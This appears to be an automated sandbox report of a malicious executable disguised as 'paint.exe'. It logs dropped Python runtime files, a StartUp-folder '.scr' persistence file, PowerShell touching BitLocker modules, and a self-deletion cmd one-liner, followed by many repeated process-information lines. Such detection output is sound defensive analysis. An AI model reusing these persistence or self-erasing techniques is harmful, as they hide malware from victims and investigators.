              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD76B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6F0BD76B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
